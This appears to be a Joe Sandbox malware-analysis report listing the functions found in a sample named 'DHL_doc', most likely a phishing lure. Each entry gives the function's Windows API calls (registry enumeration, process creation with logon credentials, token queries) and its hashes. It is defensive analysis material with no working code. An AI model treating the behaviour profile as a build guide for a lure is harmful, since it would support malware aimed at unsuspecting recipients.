Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a525a2439207765bd2ae4584b663d63ad1e69cbed7eefcc8b21a2662e7caba6f
Instruction ID: fd30a6726ad5d3b69261c73eac825913750bbfb2bf9bb13a5221e0a167c976d7
Opcode Fuzzy Hash: a525a2439207765bd2ae4584b663d63ad1e69cbed7eefcc8b21a2662e7caba6f
Instruction Fuzzy Hash: 53512172A0021EABEB258F60CC81EBF77AAEB90714F155269FE05F7080DB34DC44D6A0

Function 00F4BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4B6AE,?,?), ref: 00F4C9B5
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4C9F1
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA68
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F4BD25
RegCloseKey.ADVAPI32(00000000), ref: 00F4BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F4BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4BDF3
RegCloseKey.ADVAPI32(?), ref: 00F4BDFF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 6ca32c1a302bfc50d6835a5c877d283021d1ebc41a1fc4be9c9797c5cea1a6a5
Instruction ID: 6f33310bc2a67dddb4dcd601288dc0486069a1668e57659d43cd64f491563b96
Opcode Fuzzy Hash: 6ca32c1a302bfc50d6835a5c877d283021d1ebc41a1fc4be9c9797c5cea1a6a5
Instruction Fuzzy Hash: 95818D31508241AFD714DF24C885E2ABBF5FF84318F14859CF9568B2A2DB32ED46DB92

Function 00F1F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00F1F7B9
SysAllocString.OLEAUT32(00000001), ref: 00F1F860
VariantCopy.OLEAUT32(00F1FA64,00000000), ref: 00F1F889
VariantClear.OLEAUT32(00F1FA64), ref: 00F1F8AD
VariantCopy.OLEAUT32(00F1FA64,00000000), ref: 00F1F8B1
VariantClear.OLEAUT32(?), ref: 00F1F8BB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 47fe4d5527c7cf97a9f5eea86b553ea9499b0f3e591679656d4a33db1366cc32
Instruction ID: 29c65f245fd27e52a96d5471edf46a19cd795c848a19b3b6a083dc4de7bb6ebb
Opcode Fuzzy Hash: 47fe4d5527c7cf97a9f5eea86b553ea9499b0f3e591679656d4a33db1366cc32
Instruction Fuzzy Hash: E851E931500310BBCF10BB65DC95BA9B3E5EF45320F64946BE906EF291DB748C84EB96

Function 00F3910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00EC7620: _wcslen.LIBCMT ref: 00EC7625

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00F394E5
_wcslen.LIBCMT ref: 00F39506
_wcslen.LIBCMT ref: 00F3952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00F39585

Strings

X, xrefs: 00F39412

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 037d53e63b6d4083d00ec79e8a304227146120b4dad8b1c338967a3fc8e7a49d
Instruction ID: 55c004820f6ae2867d1b254ecca9288192fbe34e4c2ca2b68d62a124f277e975
Opcode Fuzzy Hash: 037d53e63b6d4083d00ec79e8a304227146120b4dad8b1c338967a3fc8e7a49d
Instruction Fuzzy Hash: 70E18F719083409FD714DF24C981F6EB7E5BF84324F04896DE889AB2A2DBB1DD45CB92

Function 00ED920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

BeginPaint.USER32(?,?,?), ref: 00ED9241
GetWindowRect.USER32(?,?), ref: 00ED92A5
ScreenToClient.USER32(?,?), ref: 00ED92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ED92D3
EndPaint.USER32(?,?,?,?,?), ref: 00ED9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F171EA

Part of subcall function 00ED9339: BeginPath.GDI32(00000000), ref: 00ED9357

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 37fe68a6fb6a37ac81539da129ae1f1966b07995b446cb94d00efb219b577d79
Instruction ID: fa3413d8070a8a16309a55673863f4b701b5e54cc47bed53c9f0740d848d9a35
Opcode Fuzzy Hash: 37fe68a6fb6a37ac81539da129ae1f1966b07995b446cb94d00efb219b577d79
Instruction Fuzzy Hash: D041CF30104305AFD711DF24DC84FAA7BB8FB45761F14062AFA69A72E2C7319846EB61

Function 00F307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F3080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F30847
EnterCriticalSection.KERNEL32(?), ref: 00F30863
LeaveCriticalSection.KERNEL32(?), ref: 00F308DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F308F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F30921

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 1182fead6aac24209fa69687735350bd8ac584c6abb840d295aaca8f65e44580
Instruction ID: 4e79ade59dbd870104297801edb6d2296073959bb0361e7bcad93c420a639c05
Opcode Fuzzy Hash: 1182fead6aac24209fa69687735350bd8ac584c6abb840d295aaca8f65e44580
Instruction Fuzzy Hash: 2B416D71900209EFDF14DF54DC85AAA77B9FF04320F1440A6ED05AA297DB30DE65EBA4

Function 00F581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F1F3AB,00000000,?,?,00000000,?,00F1682C,00000004,00000000,00000000), ref: 00F5824C
EnableWindow.USER32(00000000,00000000), ref: 00F58272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F582D1
ShowWindow.USER32(00000000,00000004), ref: 00F582E5
EnableWindow.USER32(00000000,00000001), ref: 00F5830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F5832F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: fa9359be8a4a1e78d54c1211028240dd2f90b48b97096b3b36270f802b4c8683
Instruction ID: 08edf728f5a7247bb80275c5f64967c63c56fbc66cb61dbb50003f55f9f17e75
Opcode Fuzzy Hash: fa9359be8a4a1e78d54c1211028240dd2f90b48b97096b3b36270f802b4c8683
Instruction Fuzzy Hash: 5441C630A01744AFDB12CF14C895BE47FE0BB0A766F184165EB099B662C731684BEF40

Function 00F24C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F24C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F24CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F24CEA
_wcslen.LIBCMT ref: 00F24D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F24D10
_wcsstr.LIBVCRUNTIME ref: 00F24D1A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ab73f4fdac82608c1e12d349ae65a70e5e25fe6254dcd5da2638fbec8ccd5946
Instruction ID: a75dd7498181341bb92c11c93508b956c68583ce714d3288797019d9868d037b
Opcode Fuzzy Hash: ab73f4fdac82608c1e12d349ae65a70e5e25fe6254dcd5da2638fbec8ccd5946
Instruction Fuzzy Hash: 4E213B326043147FEB159B39FC09E7B7BDCDF45760F10403AF90ADA192DAA1ED01A6A0

Function 00F3581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC3A97,?,?,00EC2E7F,?,?,?,00000000), ref: 00EC3AC2

_wcslen.LIBCMT ref: 00F3587B
CoInitialize.OLE32(00000000), ref: 00F35995
CoCreateInstance.OLE32(00F5FCF8,00000000,00000001,00F5FB68,?), ref: 00F359AE
CoUninitialize.OLE32 ref: 00F359CC

Strings

.lnk, xrefs: 00F35876, 00F358C1, 00F35985

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: c201ca979ba999286b3585e5951a17123dd8fff73ac1068765c44441146452af
Instruction ID: 0db2b0b4b0c6ee6ae8b37f51992893bf946d783e7b17a01b54197d26c7da49d9
Opcode Fuzzy Hash: c201ca979ba999286b3585e5951a17123dd8fff73ac1068765c44441146452af
Instruction Fuzzy Hash: 18D16571A047019FC714DF24C584A2ABBE5EFC9B20F14885DF889AB361D732ED46DB92

Function 00F2175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F20FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F20FCA
Part of subcall function 00F20FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F20FD6
Part of subcall function 00F20FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F20FE5
Part of subcall function 00F20FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F20FEC
Part of subcall function 00F20FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F21002

GetLengthSid.ADVAPI32(?,00000000,00F21335), ref: 00F217AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F217BA
HeapAlloc.KERNEL32(00000000), ref: 00F217C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00F217DA
GetProcessHeap.KERNEL32(00000000,00000000,00F21335), ref: 00F217EE
HeapFree.KERNEL32(00000000), ref: 00F217F5

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9493dafa633bb566a3c740a703373f9a57f806e522775294e108db179fa92da7
Instruction ID: b8280285e69ae3c0dc95ecee0d4904d4341645eabba610b59c0756d5b8f33905
Opcode Fuzzy Hash: 9493dafa633bb566a3c740a703373f9a57f806e522775294e108db179fa92da7
Instruction Fuzzy Hash: 4D11BE32900719FFDB109FA4EC49BAF7BA9FB95366F104018F54297212C739A940EBA4

Function 00F214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F214FF
OpenProcessToken.ADVAPI32(00000000), ref: 00F21506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F21515
CloseHandle.KERNEL32(00000004), ref: 00F21520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F2154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00F21563

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 90daa19d723af4fb2f2f3952d069dbdf436b34687392ed88ce657639aa69c979
Instruction ID: 2e439c7e52b684d7371c70ddd2d0b38828b4bec34686d04603823bf41a893f32
Opcode Fuzzy Hash: 90daa19d723af4fb2f2f3952d069dbdf436b34687392ed88ce657639aa69c979
Instruction Fuzzy Hash: CC11447250020DAFDF11CFA8ED49BDA7BA9FB48715F044064FA06A20A0C3718E60EBA0

Function 00EE3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EE3379,00EE2FE5), ref: 00EE3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EE339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EE33B7
SetLastError.KERNEL32(00000000,?,00EE3379,00EE2FE5), ref: 00EE3409

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7ce52060b4e8bc164141799903b2468eff57dde9a6f2407ba3ee84c43dabb9ec
Instruction ID: b2fd846fcb9b17c4c54db39bbd7cc554aef7839b05a5200486ec20e51850458a
Opcode Fuzzy Hash: 7ce52060b4e8bc164141799903b2468eff57dde9a6f2407ba3ee84c43dabb9ec
Instruction Fuzzy Hash: 0801F53260835EAEA72627777C8D9B63E94DB053B97302229F520A31F0EF614E0166A4

Function 00EF2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EF5686,00F03CD6,?,00000000,?,00EF5B6A,?,?,?,?,?,00EEE6D1,?,00F88A48), ref: 00EF2D78
_free.LIBCMT ref: 00EF2DAB
_free.LIBCMT ref: 00EF2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00EEE6D1,?,00F88A48,00000010,00EC4F4A,?,?,00000000,00F03CD6), ref: 00EF2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00EEE6D1,?,00F88A48,00000010,00EC4F4A,?,?,00000000,00F03CD6), ref: 00EF2DEC
_abort.LIBCMT ref: 00EF2DF2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ec5f24660187f3816d6a86f156223227cfa442b34a4e58e35d47fc7e010dddd6
Instruction ID: c9b8839cf5cfa1fece295de2e6f08ad9e1da9ce513a9c2fe6d5285f316a62ffb
Opcode Fuzzy Hash: ec5f24660187f3816d6a86f156223227cfa442b34a4e58e35d47fc7e010dddd6
Instruction Fuzzy Hash: 3AF02831545B0C2BD2122734BC0AE7F35D9AFC1BA5F20201DFB24B21E2EF36890161A0

Function 00F58A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED9693
Part of subcall function 00ED9639: SelectObject.GDI32(?,00000000), ref: 00ED96A2
Part of subcall function 00ED9639: BeginPath.GDI32(?), ref: 00ED96B9
Part of subcall function 00ED9639: SelectObject.GDI32(?,00000000), ref: 00ED96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00F58A4E
LineTo.GDI32(?,00000003,00000000), ref: 00F58A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00F58A70
LineTo.GDI32(?,00000000,00000003), ref: 00F58A80
EndPath.GDI32(?), ref: 00F58A90
StrokePath.GDI32(?), ref: 00F58AA0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b715dee71eddfed18b55e1a1b74b5a5fa4e50ac948b4f153046e8a8a69c963c5
Instruction ID: 6aa5e565b3628d40785152aaafd7abe19d895f1c2ee901c9d980633a00c14b25
Opcode Fuzzy Hash: b715dee71eddfed18b55e1a1b74b5a5fa4e50ac948b4f153046e8a8a69c963c5
Instruction Fuzzy Hash: EB11DE7640024DFFDF119F94DC88EAA7F6DEF043A5F048022BA15951A1C7719D55EFA0

Function 00F251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F25218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F25229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F25230
ReleaseDC.USER32(00000000,00000000), ref: 00F25238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F2524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F25261

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 45ca3230c9ef56217bfda84c34289cb3692e4992d275c46a2cccd0a2719a9302
Instruction ID: d269fe11fbc53014464fad7e3b52383430e80f9e17e880f3ceab950ba348d115
Opcode Fuzzy Hash: 45ca3230c9ef56217bfda84c34289cb3692e4992d275c46a2cccd0a2719a9302
Instruction Fuzzy Hash: A4014F75E00718BFEB109BA59C49A5EBFB8EB48752F044065FB05A72C1D6709900DBA0

Function 00EC1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC1C22

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 45a07a47275070d49a093862c90e223553bdd720eeb9171aad2fb99c2677e685
Instruction ID: d45401938b740e72f420e6b590a1d81252976f438db565f3793fe23f48bc8242
Opcode Fuzzy Hash: 45a07a47275070d49a093862c90e223553bdd720eeb9171aad2fb99c2677e685
Instruction Fuzzy Hash: 170167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00F2EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs
